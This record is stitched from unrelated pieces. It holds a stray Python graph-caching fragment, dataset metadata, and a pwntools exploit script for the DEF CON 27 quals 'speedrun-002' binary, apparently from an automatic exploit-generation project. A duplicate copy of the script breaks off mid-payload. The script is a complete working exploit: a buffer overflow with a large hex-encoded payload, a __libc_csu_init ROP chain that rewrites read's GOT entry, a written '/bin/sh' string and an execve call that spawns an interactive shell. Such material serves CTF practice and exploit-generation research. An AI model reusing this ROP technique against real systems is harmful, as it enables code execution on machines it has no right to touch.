self.invoke('clearFile', node, page_accession)
def __get_graph(self, page_accession):
"""
Cache graph, to avoid extra requests.
"""
if page_accession not in self.__cache:
self.__cache[page_accession] = self.invoke('getFlowData', page_accession)
return self.__cache[page_accession]
def __get_node_by_accession(self, page_accession, accession):
"""
Return node id by its accession.
"""
for node, node_data in self.__get_graph(page_accession)['fullGraph'].items():
if accession in node_data['userData']['originalAccessions']:
return node
| 120 | 3,201 | 23 |
299fd36aab0da8b10d2e00a4a1f71ae4cf849959 | 12,847 | py | Python | examples/defcon27-quals-speedrun-002/exploit_0.py | SQLab/CRAXplusplus | 0cef3434c37eea73e72e0e75332c8d67e73741cd | [
"MIT"
] | 15 | 2022-01-04T16:58:52.000Z | 2022-03-28T18:01:55.000Z | examples/defcon27-quals-speedrun-002/exploit_0.py | aesophor/CRAXplusplus | caacbeb4fadb5452ac3bf2faf5aff33580d19cca | [
"MIT"
] | 7 | 2022-01-04T13:07:18.000Z | 2022-03-24T14:38:13.000Z | examples/defcon27-quals-speedrun-002/exploit_0.py | SQLab/CRAXplusplus | 0cef3434c37eea73e72e0e75332c8d67e73741cd | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from pwn import *
context.update(arch = 'amd64', os = 'linux', log_level = 'info')
target = ELF('./target', checksec=False)
libc_2_24_so = ELF('./libc-2.24.so', checksec=False)
__libc_csu_init = 0x400840
__libc_csu_init_call_target = 0x400e48
__libc_csu_init_gadget1 = 0x400896
__libc_csu_init_gadget2 = 0x400880
canary = 0x0
libc_2_24_so_base = 0x0
pivot_dest = 0x601860
target_base = 0x0
target_leave_ret = 0x40074a
target_pop_rbp_ret = 0x400668
if __name__ == '__main__':
proc = process(['./ld-2.24.so', './target'], env={'LD_PRELOAD': './libc-2.24.so'})
payload = b'\x45\x76\x65\x72\x79\x74\x68\x69\x6e\x67\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x20\x69\x73\x20\x73\x6f\x20\x62\x6f\x72\x69\x6e\x67\x2e\x6e\x57\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x96\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x0e\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x80\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xe0\x05\x40\x00\x00\x00\x00\x00\x68\x06\x40\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x4a\x07\x40\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e'
proc.send(payload)
time.sleep(0.2)
proc.recvrepeat(0)
payload = p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.got['read'])
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x1)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.bss())
payload += p64(0x3b)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(target_base + target.bss())
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
proc.send(payload)
time.sleep(0.2)
payload = b'\x0e'
proc.send(payload)
time.sleep(0.2)
payload = b'\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
proc.send(payload)
time.sleep(0.2)
proc.interactive()
| 120.065421 | 9,006 | 0.732856 | #!/usr/bin/env python3
from pwn import *
context.update(arch = 'amd64', os = 'linux', log_level = 'info')
target = ELF('./target', checksec=False)
libc_2_24_so = ELF('./libc-2.24.so', checksec=False)
__libc_csu_init = 0x400840
__libc_csu_init_call_target = 0x400e48
__libc_csu_init_gadget1 = 0x400896
__libc_csu_init_gadget2 = 0x400880
canary = 0x0
libc_2_24_so_base = 0x0
pivot_dest = 0x601860
target_base = 0x0
target_leave_ret = 0x40074a
target_pop_rbp_ret = 0x400668
if __name__ == '__main__':
proc = process(['./ld-2.24.so', './target'], env={'LD_PRELOAD': './libc-2.24.so'})
payload = b'\x45\x76\x65\x72\x79\x74\x68\x69\x6e\x67\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x20\x69\x73\x20\x73\x6f\x20\x62\x6f\x72\x69\x6e\x67\x2e\x6e\x57\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6